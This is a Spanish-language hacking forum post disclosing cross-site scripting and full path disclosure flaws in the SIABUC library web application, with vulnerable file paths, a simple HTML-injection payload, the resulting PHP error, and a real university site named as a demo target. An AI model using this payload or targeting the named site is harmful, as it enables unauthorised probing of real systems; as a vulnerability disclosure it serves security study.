comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Xss & Full path Disclosure WebApp Library SIABUC

  • 0 Respuestas
  • 1929 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado MaztoR

  • *
  • Underc0der
  • Mensajes: 56
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • MaztoR [IN]-Security
    • Email
  • Skype: Maztor-
« en: Julio 07, 2012, 03:41:09 am »
# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:http://www.cidcacs.iis.ucr.ac.cr/

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

http://localhost/reservacion/index.php

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***


"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
-------------------------------------
| Twitter: @Mazt0r                
| Site: www.maztor.com        
| Skype: Maztor-                    
-------------------------------------

 

¿Te gustó el post? COMPARTILO!



XSS full

Iniciado por morodog

Respuestas: 5
Vistas: 6396
Último mensaje Agosto 10, 2013, 10:58:57 pm
por Anton
Codeando un exploit I: Source Code Disclosure

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1859
Último mensaje Febrero 24, 2010, 03:28:43 pm
por dracko.rx
[Tutorial] Source Code Disclosure

Iniciado por arthusu

Respuestas: 0
Vistas: 1519
Último mensaje Julio 22, 2013, 10:58:42 pm
por arthusu
Obteniendo Path Disclosures

Iniciado por Dedalo

Respuestas: 0
Vistas: 1770
Último mensaje Junio 23, 2012, 03:18:42 am
por Dedalo
Full Source Disclosure [Tutorial Basico]

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 2669
Último mensaje Mayo 08, 2012, 05:49:49 pm
por baron.power